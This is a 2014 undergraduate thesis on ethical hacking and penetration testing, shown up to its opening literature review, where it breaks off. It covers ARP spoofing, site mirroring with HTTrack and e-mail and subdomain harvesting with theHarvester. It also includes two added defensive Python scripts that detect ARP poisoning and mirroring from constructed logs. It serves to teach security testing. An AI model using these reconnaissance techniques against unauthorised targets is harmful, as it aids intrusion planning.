
ACCRA INSTITUTE OF TECHNOLOGY (AIT)

ADVANCED NETWORK HACKING AND PENETRATION TECHNIQUES

BY

WILSON WISDOM AGBOBLI


(BSC IT IN NETWORK COMPUTING WITH HONOURS -BITN)

Thesis Submitted in Partial Fulfillment of the Requirements for the


Bachelor of Science in Network Computing.

PROJECT SUPERVISOR:
MR. MICHAEL OBIRI

NOVEMBER 2014

DECLARATION & AUTHORSHIP

SIGNED COPYRIGHT/DECLARATION OF AUTHORSHIP

This is to declare that the research work underlying this thesis has been carried out by the
under-mentioned student under the supervision of the under-mentioned supervisor. Both the student
and the supervisor certify that the work documented in this thesis is the output of the research
conducted by the student as part of his final year project work in partial fulfillment of the
requirements of the BSc in Information Technology in Network Computing with Honours (BITN).

FULL NAME OF STUDENT

NAME OF SUPERVISOR

-----------------------------------Signature

-----------------------------Signature

Date ___________

Date_____________


ABSTRACT

With the emergence of network globalization and the advent of the internet as the major tool for
international exchange of information, security has always been the most talked-about topic.
Although there are many ways to secure systems and applications, the only way to truly know
how to secure the network is to test it using testing procedures.
Hacking and penetration testing is a testing procedure performed to test the perimeter of a
network for security breaches and vulnerabilities. Penetration testing is also known as ethical
hacking because the test is performed by a team of security experts who have the organization's
permission to hack the network in an attempt to identify vulnerabilities.
If vulnerabilities are discovered, this helps the organization defend itself against further attacks.
By using the same tools and methodologies hackers use, administrators can test their security
procedures and discover vulnerabilities before they are exploited by someone else.
Any security issues that are found will be presented to the system owner, together with an
assessment of their impact, and often with a proposal for mitigation or a technical solution. Thus
all the work is done in a proper manner.


ACKNOWLEDGMENT

I would like to thank the almighty God for His guidance, empowerment, mercy and good health
throughout my academic pursuits and particularly my thesis.
No volume of words is enough to express my sincere gratitude towards my thesis supervisor Mr Michael
Obiri, Manager of Network Systems and Support Unit, and a lecturer at Accra Institute of Technology
for his immense guidance, selfless dedication and empowerment.
Finally, I wish to express my deep gratitude to all my siblings, Ruben, Cephas, Favour, Edem, Eyram
and, not forgetting, my loyal friend at Ho Polytechnic, Rabbi Blagogee, for their moral support.


DEDICATION

I humbly dedicate this work to the Almighty God for showing His faithfulness by guiding me
through my thesis successfully and the four years I spent pursuing this programme.
I further dedicate this to my beloved parents, Mr & Mrs Gabriel Agbobli. In addition, I
dedicate this work to my wife, Mrs Felicia Agbobli, and our lovely children Jared Makafui
Agbobli, Kendra Fafali Agbobli and Janelle Klenam Agbobli for their support.
Last but not least, I thank Mr Moses Ofosu-hene, lecturer and administrative staff at
Accra Institute of Technology (AIT), for his motivation and encouragement when the going
became tough in pursuing my programme.

TABLE OF CONTENTS
TITLE PAGE ..... i
DECLARATION OF AUTHORSHIP ..... ii
ABSTRACT ..... iii
ACKNOWLEDGMENT ..... iv
DEDICATION ..... v
TABLE OF CONTENTS ..... vi
LIST OF FIGURES ..... vii
LIST OF TABLES ..... viii
ABBREVIATION & ACRONYMS ..... ix
CHAPTER ONE ..... 1
1.0. Introduction ..... 1
1.1. Objective of the Study ..... 2
1.2. Research Problem Statement ..... 2
1.3. Research Question ..... 3
1.4. Background & Justification of Study ..... 3
1.5. Significance of the Study ..... 4
1.6. Limitation & Delimitation ..... 4
1.7. Definition of Terms ..... 5
CHAPTER TWO ..... 6
2.1. Introduction ..... 6
2.2. Reconnaissance ..... 6
2.2.1. Social Engineering ..... 10
2.3. Scanning and Enumeration ..... 11
2.3.1. Vulnerability Scanning ..... 12
2.4. Exploitation and Privilege Escalation ..... 17
2.4.1. Privilege Escalation ..... 19
2.5. Conclusion ..... 20
CHAPTER THREE ..... 30
3.0 Introduction ..... 30

3.1 Information gathering ..... 30
3.1.1 Active Reconnaissance tool ..... 31
3.2 Passive Reconnaissance techniques ..... 37
3.3 Scanning ..... 43
3.3.1 Network discovery information tools ..... 43
3.3.2 Scanning network ports & service identification ..... 46
3.3.3 Wireless discovery & scanning tools ..... 52
3.3.4 Web application discovery/scanning tools ..... 55
3.4 Vulnerability analyses ..... 60
3.4.1 Vulnerability scanning ..... 60
3.4.2 Network vulnerability scanning tools ..... 63
3.5 Attacking phase ..... 65
3.5.1 Gaining access tools ..... 65
3.6 Vulnerability exploitation tool ..... 68
3.7 Wireless attacking tool ..... 71
3.8 Browser exploitation framework ..... 78
3.9 Evading defenses & Erasing tracks ..... 79
CHAPTER FOUR ..... 82
4.0 Introduction ..... 82
4.1 Proposed framework for Netw. Pen-testing ..... 82
4.2 Planning ..... 83
4.2.1 Requirements for a pen-test ..... 84
4.3 Information or Intelligence gathering ..... 85
4.3.2 Maltego ..... 85
4.4 Scanning and Vulnerability Assessment ..... 90
4.4.1 Network Mapping (Nmap) ..... 90
4.4.2 Zenmap ..... 91
4.5 Exploitation/ Attack ..... 95
4.5.1 Privilege Escalation ..... 101
4.6 Using Armitage for Attack ..... 101
4.7 Compromise the target machine ..... 103
4.8 Report ..... 109
CHAPTER FIVE ..... 111
5.1 Analysis and Discussion ..... 111
5.2 Reflection on the Proposed methodology ..... 112
5.3 Contribution ..... 113
5.4 Future work ..... 114
5.5 Conclusion ..... 115
5.6 Reflection ..... 116

LIST OF TABLES
Table 4.15 ..... 101
Table 4.16 ..... 104
Table 4.17 ..... 105
Table 4.18 ..... 106
Table 4.19 ..... 107
Table 4.20 ..... 110

LIST OF FIGURES
Figure 2.1 ..... 12
Figure 2.2 ..... 13
Figure 2.3 ..... 14
Figure 2.4 ..... 15
Figure 2.5 ..... 21
Figure 2.6 ..... 22
Figure 2.7 ..... 22
Figure 2.8 ..... 23
Figure 2.9 ..... 27
Figure 2.10 ..... 28
Figure 3.1 ..... 34
Figure 3.2 ..... 35
Figure 3.3 ..... 36
Figure 3.4 ..... 37
Figure 3.5 ..... 37
Figure 3.6 ..... 39
Figure 3.7 ..... 40
Figure 3.8 ..... 41
Figure 3.9 ..... 42
Figure 3.10 ..... 42
Figure 3.11 ..... 43
Figure 3.12 ..... 43
Figure 3.13 ..... 45
Figure 3.14 ..... 49
Figure 3.15 ..... 49
Figure 3.16 ..... 50
Figure 3.17 ..... 54
Figure 3.18 ..... 54
Figure 3.19 ..... 57
Figure 3.20 ..... 57
Figure 3.21 ..... 58
Figure 3.22 ..... 60
Figure 3.23 ..... 61
Figure 3.24 ..... 66
Figure 3.25 ..... 68
Figure 3.26 ..... 69
Figure 3.27 ..... 70
Figure 3.28 ..... 71
Figure 3.29 ..... 73
Figure 3.30 ..... 73
Figure 3.31 ..... 74
Figure 3.32 ..... 74
Figure 3.33 ..... 76
Figure 3.34 ..... 76
Figure 3.35 ..... 76
Figure 3.36 ..... 77
Figure 3.37 ..... 77
Figure 3.38 ..... 78
Figure 4.1 ..... 82
Figure 4.2 ..... 86
Figure 4.3 ..... 87
Figure 4.4 ..... 88
Figure 4.5 ..... 89
Figure 4.6 ..... 92
Figure 4.7 ..... 92
Figure 4.8 ..... 93
Figure 4.9 ..... 97
Figure 4.10 ..... 98
Figure 4.11 ..... 98
Figure 4.12 ..... 99
Figure 4.13 ..... 100
Figure 4.14 ..... 101
Figure 4.16 ..... 104
Figure 4.17 ..... 105
Figure 4.18 ..... 106
Figure 4.19 ..... 107
Figure 4.20 ..... 110

ABBREVIATION & ACRONYMS

ISP         Internet Service Provider
IDS         Intrusion Detection System
DNS         Domain Name System
IP          Internet Protocol
TCP         Transmission Control Protocol
UDP         User Datagram Protocol
GUI         Graphical User Interface
NMAP        Network Mapper
ICMP        Internet Control Message Protocol
FTP         File Transfer Protocol
HTTP        HyperText Transfer Protocol
IMAP        Internet Message Access Protocol
MS-SQL      Microsoft Structured Query Language (SQL Server)
MySQL       My Structured Query Language
NCP         NetWare Core Protocol
NNTP        Network News Transfer Protocol
POP3        Post Office Protocol version 3
REXEC       Remote Execution
RLOGIN      Remote Login
SMTP        Simple Mail Transfer Protocol
SMTP-AUTH   Simple Mail Transfer Protocol Authentication
SNMP        Simple Network Management Protocol
SSHv2       Secure Shell Version 2
TELNET      Teletype Network
VNC         Virtual Network Computing
SVN         (Apache) Subversion

CHAPTER ONE

1.0. INTRODUCTION

About two or three decades ago, people were quite happy to leave their houses and cars unlocked
because crime levels were low. Times have changed, and the world is fast becoming an
insecure place to live, especially for organizations that handle a heavy influx of data on a daily
basis; security has always been an important issue because of network globalization and the
internet. Ethical hacking and penetration techniques are preventive measures that
consist of a chain of legitimate tools that identify and exploit a company's security weaknesses.
Ethical hacking and penetration testing provide a platform for finding flaws in network systems.
Vulnerability assessment takes centre stage in finding the weaknesses of networks and exploiting
such vulnerabilities to demonstrate the weakness of the network. Penetration testing in general involves
many techniques, such as social engineering and reconnaissance, and most importantly
methodologies for using the required tools.
In all these activities a penetration test is undertaken to find flaws in information systems, which
in turn determines a lasting solution to mitigate those vulnerabilities before black hat hackers take
advantage of the systems.

1.1. OBJECTIVE OF THE STUDY

Global Objective
Penetration testing is one of the oldest methods for assessing the security of a computer system.
In the early 1970s, the Department of Defense used this method to demonstrate
the security weaknesses in computer systems and to initiate the development of programs to
create more secure systems. Penetration testing is increasingly used by organizations to assure
the security of information systems and services, so that security weaknesses can be fixed before
they are exposed.

The purpose of this exercise is to identify methods of gaining access to a system by using
common tools and techniques used by hackers. A real-world analogy shows how an attacker
first exploits a vulnerable system and then takes control of it.
In this analogy, a house has a weak lock on its door: that is the vulnerability. A
thief arrives with a bunch of keys. He knows exactly which key will open the
door: that is selecting the appropriate exploit from many. After entering the house, he can steal
something, leave a backdoor open, make a duplicate key or change the lock for his
uninterrupted entry: that is the payload.
Penetration testing can be defined as security-oriented probing of a computer system or
network to seek out vulnerabilities that an attacker could use in an attempt
to intrude into host, network or application resources.
The goal of a penetration test is to increase the security of the computing resources being tested.
It is important for the pen-tester to keep detailed notes about how the tests were done so that the
results can be verified and any issues that were uncovered can be resolved.
Hacking is basically a technique for logging on to a system illegally or without the consent of its
owner, and penetration testing serves as a process for learning the flaws or vulnerabilities of a network or
system. The global objective of this thesis is to find out the most well-known hacking and pen-test
tools and how they are applied, not forgetting reconnaissance, the core element of hacking, which is
made up of passive and active reconnaissance.
Ethical hacking is the concept of using hacking and attacking techniques to find and exploit
vulnerabilities and access the network system by penetration for the purpose of improving
system security. The central concept is to practically apply the techniques involved in hacking and
penetration testing, which will unveil vulnerabilities in a network system for security
improvement and reconnaissance.

Specific objectives
My main specific objective is to gain full knowledge of applying reconnaissance in all its categories
in black box penetration testing, vulnerability assessment and penetration testing, and, most
importantly, of the tools required to mitigate such acts against a network: the accurate
tools and methods used to assess the flaws found in a network system, how to exploit such
weaknesses, and how to block those security vulnerabilities against hackers.
The core specific objectives of this study are as follows:

- The use of well-known software tools for hacking
- The importance of active and passive reconnaissance techniques
- Prevention of network system information entering the public domain
- Software tools for hacking countermeasures
- The need for penetration testing

Delving into this list will give the reader broad knowledge of hacking
techniques and their countermeasures; it will also give readers a platform for preventing
organizational information, especially information that must be kept secret, from entering the public domain.

1.2. RESEARCH PROBLEM STATEMENT

Ethical hacking and penetration testing are the practice by which vulnerabilities are found in an information
system, and such acts are done in consultation with the owners of the network. Notwithstanding,
social engineering is the art of utilizing human behaviour to breach security without the
participant even realizing that they have been manipulated. Sometimes black hat hackers get their
chance when there are genuine gaps in the security that they can breach.

The problem statements of advanced hacking and penetration techniques are as follows:
- Ninety percent (90%) of social engineering techniques are used for active and passive
  reconnaissance against the targeted network.
- Weak implementation leaving genuine security gaps in networks.
- How to eliminate the two main categories of social engineering techniques:
  - Technology-based deception
  - Human-based deception
- Tools, such as software, and methods available to restrict black hat hackers after
  applying a penetration test.
- Software tools used to identify vulnerabilities in information systems and techniques
  to prevent such flaws.
- Legal implications when a red team exposes vulnerabilities found after penetration testing
  when a proper legal agreement has been signed by the parties involved.

The reason behind all this exploration is to know how to build a well-secured network infrastructure
and information system.

1.3. RESEARCH QUESTIONS

With e-commerce at its peak, more sensitive information is being passed around on
computer networks. Financial and identity information are at high risk of being stolen or
modified as legitimate and illegitimate users take advantage of the ease of doing business online
through web applications.
Sensitive user information is constantly transported between sessions after authentication, and
hackers are putting their best effort into stealing, modifying and even damaging the systems housing the data.
Computer networks face a variety of serious threats and risks. Many of these threats are based on
vulnerabilities in the protocols themselves; for example, the Address Resolution Protocol (ARP) uses a "pick
me" approach to resolving computers on a network. When computer A tries to communicate with
B, ARP sends out a broadcast to the network devices asking "who is B?" But there is no
authentication built into ARP, so ARP has no way of determining whether the response
("pick me") is really from B or not. By exploiting this lack of authentication, a malicious computer can
tell ARP that it is computer B, after which ARP will begin directing future requests for computer B to
the malicious computer.
The final consequence is the disclosure of data, which can be an act of economic terrorism;
alteration of data, such as grade fixing; and denial-of-service attacks, including synchronization
(SYN) flooding and smurfing.
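Because ARP has no authentication, the only practical defence short of static entries or switch-level inspection is to watch for the two symptoms the paragraph describes: an IP address that suddenly answers from a different MAC, and one MAC that answers for several IPs. The following is an added example (not part of the thesis, and not a real capture) that checks both from ARP replies recorded in a tcpdump-style text form; the sample lines, the function names and the "trusted gateway" binding are constructed for the example.

```python
"""Detect ARP cache poisoning from captured ARP replies (added example, constructed data)."""
import re
from collections import defaultdict

# Constructed sample in the layout `tcpdump -n arp` prints: the gateway
# 192.168.1.1 is first announced by one MAC and then claimed by another.
SAMPLE_ARP_LOG = """\
12:00:01 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
12:00:02 ARP, Reply 192.168.1.20 is-at aa:bb:cc:00:00:20, length 28
12:00:03 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
12:00:04 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
12:00:05 ARP, Reply 192.168.1.30 is-at de:ad:be:ef:00:99, length 28
"""

REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)


def parse_arp_replies(text):
    """Return (timestamp, ip, mac) for each ARP reply.

    Requests are ignored: only replies (the 'pick me' answers) bind an IP to a MAC."""
    replies = []
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def detect_arp_anomalies(replies, trusted=None):
    """Flag the two symptoms of ARP poisoning described in the text.

    trusted: optional dict ip -> mac of known-good bindings (e.g. the gateway);
    those are never overwritten by what is observed, so a spoofed reply keeps
    raising an alert instead of silently becoming the new 'truth'.
    Returns the alerts in the order they were raised."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ip_to_mac = dict(trusted)
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            # Symptom 1: an IP we already know now answers from a different MAC.
            alerts.append({"time": ts, "type": "ip_mac_change", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        if ip not in trusted:
            ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            # Symptom 2: one MAC claims several IPs, typical of a host
            # answering for both the gateway and a victim.
            alerts.append({"time": ts, "type": "mac_multiple_ips", "mac": mac,
                           "ips": sorted(mac_to_ips[mac])})
    return alerts


if __name__ == "__main__":
    gateway = {"192.168.1.1": "aa:bb:cc:00:00:01"}   # constructed known-good binding
    for alert in detect_arp_anomalies(parse_arp_replies(SAMPLE_ARP_LOG), gateway):
        print(alert)
```

Run against the sample with the gateway binding supplied, the script raises two alerts: an `ip_mac_change` for 192.168.1.1 at 12:00:04 and a `mac_multiple_ips` for `de:ad:be:ef:00:99` at 12:00:05. In practice the replies would come from a capture on a monitoring port, and the trusted table would hold the gateway and other fixed infrastructure; tools such as arpwatch apply the same idea continuously.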

This statement showcases just a few of the flaws you can find in a computer network system that
hackers can take advantage of to illegally compromise your machine. The study seeks to
investigate the techniques of hacking, the conduct of penetration testing, and most importantly the
measures to be implemented to mitigate or prevent hacking.
The study seeks to answer the following questions:
- What are the techniques behind hacking?
- What are the benefits of penetration testing, and what laws govern it?
- What techniques or measures mitigate or prevent hacking?
- What software tools exist for hacking and penetration testing?

1.4. BACKGROUND AND JUSTIFICATION OF STUDY

Two to three decades ago, people would be quite happy to leave their houses and cars unlocked,
and even to leave the doors of their houses wide open, because crime levels were low. Times have
changed, and the world is becoming a much worse place to live and work in; since security has
always been an important issue because of network globalization and the internet, attackers are always
looking to violate it for their own ends.
Over the past many years, it has been common to hear about various types of attacks on
networking, financial and many other organizations. The time has come when protection is a
must against everyone out there, whether skilled attackers or script kiddies. For better
protection, it is good to know about current and past vulnerabilities and to patch all equipment as
soon as vulnerability patches are available. However, this alone is not sufficient.
Everyone is human, and there will be mistakes, whether granting full access permission to a
server by accident or not setting a password on the administrator account because it makes life
easier to manage. No matter how much patching is done, systems can still be vulnerable to
attack. Thus a framework was needed that could provide assurance of a secure network
by finding the weaknesses before they are exposed. This is where penetration testing comes in.

In today's world, money dominates every department of human life more than trustworthiness.
However, because most business transactions have been automated, criminals need greater
knowledge to conduct computerized crimes. Most businesses have many vulnerabilities in their
computer systems that can be used to hack illegally into their network
systems for personal and other gains. After completion of this project, loopholes in
information systems will be identified and mechanisms to seal them off (which is the paramount
aim of this project) will be outlined.
In Ghana, most programmers are developing programs for small- and large-scale businesses
without any penetration testing to show the security level of these programs. Therefore, any new
software or program that will be implemented in my domain will be subjected to ethical hacking
and penetration testing to find out whether it has any vulnerability.
The outcome will spell out general weaknesses in network designs. This research will bring out
the number of open TCP and UDP ports, weaknesses in application software, and how easily
active and passive reconnaissance can gather information. The benefit of this project can be a road map for measures to
be implemented to mitigate or prevent hackers detecting weaknesses in your network design.

1.5. SIGNIFICANCE OF THE STUDY

The importance of this study lies strictly in its focus on white hat hacking, which is legitimate
security testing bounded by a contractual agreement. Its main purpose is to
improve the system by finding its flaws, which can then be closed before a real criminal hacker
wilfully penetrates it.
Moreover, it applies penetration testing, which is an authorized attempt to intrude into an
organization's network to ascertain the exploitability of security vulnerabilities in the organization's
information systems, including the techniques adopted in social engineering.
The way to differentiate between an ethical hacker and a malicious hacker is to examine the
attacker's motivation. If the attacker is motivated or driven by personal gain, including profit
through extortion or other devious methods of collecting money from the victim, revenge,
fame, or the like, he or she should be considered a black hat; these are the motives behind the
information gathering of malicious attackers. If the attacker is pre-authorized and his or her motivation is to
help the organization and improve its security, he or she can be considered a white hat.

1.6. LIMITATIONS AND DELIMITATION OF THE STUDY

Penetration testing cannot be expected to identify all possible weaknesses, nor does it guarantee
that a system is 100% secure. New technology and hacking methods can create new exposures not
anticipated during the penetration test. Thus it is certainly possible that hacking incidents will
occur after a penetration test, because it is impossible to have full protection for an
organization's security system, only good protection.
Penetration testing involves taking screenshots or copying sensitive information as
evidence to prove that the system has key security weaknesses. However, there are many
restrictions on the extent of information that will be available and legitimately accessible to the
ethical hacker. This prevents a penetration test from simulating malicious hackers' activities as
closely as possible, because malicious hackers are not constrained by any such limitations. Firstly, penetration testing
may be governed by the laws and contractual obligations of the organization's system, because if
the test unintentionally retrieves highly confidential information, this may result in violating
laws and breaching contractual agreements.
Finally, companies that outsource their IT infrastructure may restrict similar techniques because of
licensing agreements. All of these restrictions imply that organizations and ethical hackers
should take additional measures to reduce the risk of unwanted liability by having detailed
written agreements between the company and the ethical hacker that define the scope, objectives, terms
and any limitations of the engagement. In addition, a penetration test is usually performed
with limited resources over a specific period of time. Therefore, once an ethical hacker has
identified the current risks and threats to which the system is exposed, the organization should immediately
take corrective action to mitigate these security loopholes and decrease the potential exposure to
malicious hackers.
A limitation is a shortcoming, condition or influence that I cannot control and that places restrictions
on my methodology and the conclusions that follow.

This study is limited by the following:

- Getting the right information will not be possible.
- Acquiring the right or required software tools for penetration testing.
- Incorrect data will be collected when questionnaires are distributed in the domains of
  banks, Internet Service Providers (ISPs) and other data centres.
- Evaluation of software tools without adequate features.

Delimitations of the study are:

- Full penetration testing
- Denial of service testing
- Scanning a network or systems
- Social engineering techniques
- Knowing the varieties of software testing tools and how they are used
- Learning all the techniques of active and passive reconnaissance

An organization should consider penetration testing as part of its overall security strategy based
on two factors: the significance and the likelihood of security exploitation by malicious hackers.
Security controls are the foundation of the trust placed in the organization by its stakeholders. Thus the
significance relates to the degree of the breach of trust by customers, employees and other
stakeholders. The likelihood of occurrence relates to the target of choice and the target of
opportunity. If an organization is large and has a high profile, such as a government or a
bank, it is a preferred target. If an organization lacks security controls, it is
more susceptible to a higher incidence of attacks because of the relative ease of access.
Therefore, if an organization estimates that its security breaches would have high significance and
likelihood, it may be cost-beneficial to run combined automated and manual penetration
testing with various internal and external techniques as part of its security strategy.

1.7. DEFINITION OF TERMS

Reconnaissance: the information-gathering step; the process of searching for valuable
information to be used in a penetration test.
Social Engineering: tricking someone into doing something for you without his or her
consent, especially giving out information to which you would not otherwise be able to gain access.
Ports: numbers associated with, or representing, application software in computer
systems.
Scanning: probing networks or information systems with a tool to acquire port numbers,
IP addresses, etc.
Denial of service: a form of attack in which packets with adulterated headers are sent
continuously from a workstation to a server; the server's buffer receives more
packets than necessary without any acknowledgment, which freezes the server.

CHAPTER TWO

LITERATURE REVIEW

2.1. INTRODUCTION
Advanced Hacking and Penetration Techniques spells out techniques such as passive and
active reconnaissance and social engineering, which are the first and foremost methods of
information gathering, including the identification of security flaws in network systems.
However, it is very important to know the measures and techniques to be implemented with users to
avoid preliminary information gathering, as well as to identify security vulnerabilities and
put measures in place to block such loopholes. Penetration techniques must be applied to test the
robustness and durability of network systems, because any software or program can have security
flaws that must be put under test.
This study will review much research conducted on this topic. The body of the literature may
be classified as follows: active reconnaissance tools will be used intensively for
gathering vulnerabilities; passive and social engineering techniques will also be applied
practically to gain valuable information; and measures will be derived on how to educate computer
users in an institution to hold on to information that is not meant for public consumption.
Additionally, available penetration testing or hacking software tools used to find
flaws or vulnerabilities in network systems will be explored, along with the necessary techniques to be adopted.
The body of the literature may be classified under four main headings, namely Reconnaissance;
Scanning and Enumeration; Exploitation and Privilege Escalation; and Evading Defenses and Erasing
Tracks. Many articles and books researching the current technological trends adopted in
the 21st century in the environment of hacking techniques were reviewed.

2.2 Reconnaissance:
A malicious user, meaning a rogue employee, contractor, or other user who abuses his or her
privileges, is a common term in security circles and in headlines about information breaches. A
long-standing statistic states that insiders carry out 80 percent of all security breaches.
Hackers are very good at one thing: getting inside your head without you even knowing it. They
are systematic and methodical in gathering all pieces of information related to the technologies
used in your environment. Footprinting is the determination of the potential security exposures of a
particular network system. A good information gatherer is made up of equal parts hacker, social
engineer, and private investigator. Good criminals spend months planning, scheming (making
clever secret plans that often deceive others), organizing, and reviewing details before the heist
(a crime in which valuable items are taken illegally).
The major question an aspiring hacker asks is "How do I go from a single company name to
owning the systems inside the network?" Knowing only the name of the company, the first step in
reconnaissance is to conduct a thorough search of public
information. Although it should be pointed out that some tools or techniques used in
reconnaissance do in fact send information directly to the target, it is important to know the
difference between the tools that do and the tools that do not touch the target. There are two main
goals in this phase: first, we need to gather as much information as possible about the target;
second, we need to sort through all the information gathered and create a list of attackable IP
addresses.
To be successful at reconnaissance, you must have a strategy; nearly all facets of information
gathering leverage the power of the internet. A typical strategy needs to include both active and
passive reconnaissance.
Active reconnaissance includes interacting directly with the target. It is important to note that
during this process the target may record our IP address and log our activity.
Passive reconnaissance makes use of the vast amount of information available on the web.
When we are conducting passive reconnaissance, we are not interacting directly with the target
and, as such, the target has no way of knowing, recording, or logging our activity. In most cases
the first activity is to locate the target website; we begin step 1 by closely reviewing the target's
website. In some cases, we may actually use a website copier called HTTrack to make a page-by-page
copy of the website. HTTrack is a utility that creates an
identical, off-line copy of the target website. The copied website will include all the pages, links,
pictures, and code from the original website; however, it will reside on your local computer.
Please be aware that this activity is easy to trace and is considered highly offensive; never run
this tool without prior authorization. Once HTTrack has finished copying the target website, it
will present you with a webpage allowing you to browse the mirrored website in a browser or
navigate to the path where the site was stored.
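The text notes that mirroring a site is easy to trace. As an added example (not from the thesis, and not HTTrack's own code), the following script shows what that trace looks like from the web server's side: it parses combined-format access log lines and flags a client either by a mirroring user-agent or by fetching many distinct pages in a short burst, which catches mirroring even when the user-agent has been changed. The log lines are constructed; the HTTrack user-agent string is assumed to be its default, and the function names and thresholds are the example's own.

```python
"""Spot website mirroring in web-server access logs (added example, constructed data)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed combined-format access log lines; no real server or client is represented.
# 203.0.113.7 browses normally, 198.51.100.9 mirrors with HTTrack's default user-agent,
# 192.0.2.44 mirrors with a browser-like user-agent.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [10/Nov/2014:09:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/33.0"
203.0.113.7 - - [10/Nov/2014:09:00:05 +0000] "GET /about HTTP/1.1" 200 3100 "http://www.example.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/33.0"
198.51.100.9 - - [10/Nov/2014:09:01:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.9 - - [10/Nov/2014:09:01:00 +0000] "GET /about HTTP/1.1" 200 3100 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.9 - - [10/Nov/2014:09:01:01 +0000] "GET /products HTTP/1.1" 200 8800 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.9 - - [10/Nov/2014:09:01:01 +0000] "GET /contact HTTP/1.1" 200 2200 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.9 - - [10/Nov/2014:09:01:02 +0000] "GET /news HTTP/1.1" 200 4100 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.0.2.44 - - [10/Nov/2014:09:05:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
192.0.2.44 - - [10/Nov/2014:09:05:00 +0000] "GET /about HTTP/1.1" 200 3100 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
192.0.2.44 - - [10/Nov/2014:09:05:01 +0000] "GET /products HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
192.0.2.44 - - [10/Nov/2014:09:05:01 +0000] "GET /contact HTTP/1.1" 200 2200 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
192.0.2.44 - - [10/Nov/2014:09:05:02 +0000] "GET /news HTTP/1.1" 200 4100 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
192.0.2.44 - - [10/Nov/2014:09:05:03 +0000] "GET /careers HTTP/1.1" 200 1900 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/38.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substrings of user-agents that identify site-copying tools (HTTrack's default assumed).
MIRROR_UA_MARKERS = ("httrack", "webcopier", "wget")


def parse_access_log(text):
    """Return one dict per combined-format line; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(entry)
    return entries


def detect_mirroring(entries, window_seconds=60, max_distinct_paths=4):
    """Map client IP -> sorted list of findings ('mirror_user_agent', 'burst_crawl').

    burst_crawl fires when a client requests more than max_distinct_paths
    different paths inside any sliding window of window_seconds."""
    findings = defaultdict(set)
    recent = defaultdict(deque)          # ip -> (timestamp, path) pairs inside the window
    for e in sorted(entries, key=lambda x: x["ts"]):
        ip = e["ip"]
        if any(marker in e["ua"].lower() for marker in MIRROR_UA_MARKERS):
            findings[ip].add("mirror_user_agent")
        window = recent[ip]
        window.append((e["ts"], e["path"]))
        while (e["ts"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if len({path for _, path in window}) > max_distinct_paths:
            findings[ip].add("burst_crawl")
    return {ip: sorted(kinds) for ip, kinds in findings.items()}


if __name__ == "__main__":
    for ip, kinds in detect_mirroring(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(ip, ", ".join(kinds))
```

On the sample, 198.51.100.9 is reported for both the user-agent and the burst, 192.0.2.44 for the burst only, and the ordinary visitor 203.0.113.7 is not reported. The thresholds are deliberately low for a thirteen-line sample; on a real site they would be tuned to the normal page-per-minute rate of human visitors.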

The HTTrack website copier screenshot shows how a website is mirrored onto another
machine.

Figure 2.1: HTTrack website copier

It is very difficult, if not impossible, for a company to determine when a hacker or penetration
tester is conducting passive reconnaissance. This activity offers a low-risk, high-reward situation
for attackers. Recall that passive reconnaissance is conducted without ever sending a single
packet to the target systems. Our weapon of choice for this task is the internet.
An excellent tool to use in reconnaissance is the Harvester. The Harvester is a simple but
highly effective Python script written by Christian Martorella at Edge Security. This tool allows
us to quickly and accurately catalog both e-mail addresses and subdomains that are directly related
to our target.
As you can see, the Harvester was effective in locating at least two e-mail addresses that could
be of value to us. Please note that the e-mail addresses in the screenshot have been circled and
obfuscated. The Harvester was also successful in finding at least two additional subdomains. Both
booksite.syngress.com and ebook_www.syngress.com need to be fully reconned. We simply add
these new domains to our target list and begin the reconnaissance process again.

Figure 2.2: Output of the Harvester
Reconnaissance is very cyclical, because in-depth reconnaissance often leads to the discovery of
new targets, which in turn leads to additional reconnaissance. As a result, the time needed to
complete this phase will vary from several hours to several weeks. Remember, a determined
